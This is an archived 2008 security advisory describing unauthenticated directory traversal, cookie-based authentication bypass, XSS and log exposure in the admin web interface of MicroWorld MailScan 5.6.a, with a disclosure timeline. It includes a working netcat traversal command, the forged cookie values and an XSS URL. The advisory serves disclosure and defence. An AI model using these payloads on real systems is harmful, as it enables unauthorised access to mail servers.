Exploit the possiblities

mailscan-multi.txt

mailscan-multi.txt
Posted Aug 16, 2008
Authored by Oliver Karow | Site oliverkarow.de

MailScan for Mail Servers version 5.6.a suffers from directory traversal, authentication bypass, cross site scripting, and log file access vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | 127cfd5afcc6fa75030d4453bef425dd

mailscan-multi.txt

Change Mirror Download
MicroWorld MailScan - Multiple Vulnerabilities within Admin-Webinterface
========================================================================


>> Affected Products <<


- MailScan for Mail Servers

* Version: 5.6.a with espatch1
* Win32 Platform

Other Mailscan Products, Versions, also, if available
for other platforms, were not tested.


>> Product/Company Information <<


From MicroWorld's website: "MailScan 5.6 is the world's most
advanced Real-Time AntiVirus and AntiSpam solution for Mail Servers.
The software safeguards organizations against Virus, Worm, Trojan and
many other malware breeds with futuristic and proactive technologies.
Employing an array of intelligent filters, MailScan offers powerful
protection against Spam and Phishing mails along with comprehensive
Content Security."

http://www.microworld.de
http://www.mwti.net

>> Vulnerabilities <<


MailScan offers "Web Based Administration". The administration console
(Server.exe) is running as an http service on tcp port 10443 with
LocalSystem privileges. The communication is plain http without SSL/TLS.

The interface is vulnerable to the attacks described below. All attacks
do *not* require authentication.


-- >> Directory Traversal <<

It is possible to access files on the system outside of the webroot
directory with privileges of the LocalSystem account:

echo -e "GET /../../../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port>


-- >> Authentication bypass <<

After a login attempt with an invalid username and password, the application
is setting a cookie at the webclient with the following content:

Set-Cookie: User=admin; path=/
Set-Cookie: login=true; path=/
Set-Cookie: IsAdmin=false; path=/
Set-Cookie: IP=; path=/


Providing valid username and password will give a cookie with the
following content:

Set-Cookie: User=admin; path=/
Set-Cookie: login=true; path=/
Set-Cookie: IsAdmin=true; path=/
Set-Cookie: IP=; path=/

It is sufficient to set the cookie as shown above to get authenticated on the
admin interface. The user "admin" is a default account, with a password set during
installation.

*BUT* requesting a resource on the webserver *without* supplying a cookie will
also grant access to the requested resource. The attacker just needs to know
the path to the resource.



-- >> Cross-Site-Scripting (XSS) <<

http://ip:10443/<script>alert("No_Problem_its_just_an_admin_interface")</script>



-- >> Access to Logfile <<


It is possible to access the logfiles of the application because the folder
"/LOG" inside the webroot ("C:\Program Files\Common Files\MicroWorld\WebServer")
is not protected.... note that this does not require the directory traversal,
mentioned before and thus is imho a separate vuln.
The logfiles contain different information, like installation path, ip adresses,
and error messages.

http://ip:10443/LOG/W072808.LOG (Format seems to be W:Month:Date:year)

and

http://ip:10443/LOG/Weblog.LOG

>> History <<

28. July 2008 - Touching base with MicroWorld's Support via Messenger
28. July 2008 - Sending High-Level description of vulns and RFP-Policy to agree
30. July 2008 - MicroWorld agreed to the policy
30. July 2008 - Detailed description and PoC-Script creating an admin user without
authenticatin send to Microworld
01. Aug. 2008 - Asking Microworld if they were able to reproduce
02. Aug. 2008 - MicroWorld answered: "Not Yet"
05. Aug. 2008 - Asking Microworld if they were able to reproduce, and if yes, when
a patch will be available
13. Aug. 2008 - No response from Microworld; I informed them that i will publish
an advisory within the next days
15. Aug. 2008 - Advisory release


>> Credits <<

mail: Oliver-dot-karow-at-gmx-dot-de
advisory: http://www.oliverkarow.de/research/mailscan.txt
blog: http://oliver.greyhat.de/2008/08/15/multiple-vulnerabilities-within-mailscan-admin-interface/


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    1 Files
  • 22
    Jan 22nd
    15 Files
  • 23
    Jan 23rd
    12 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close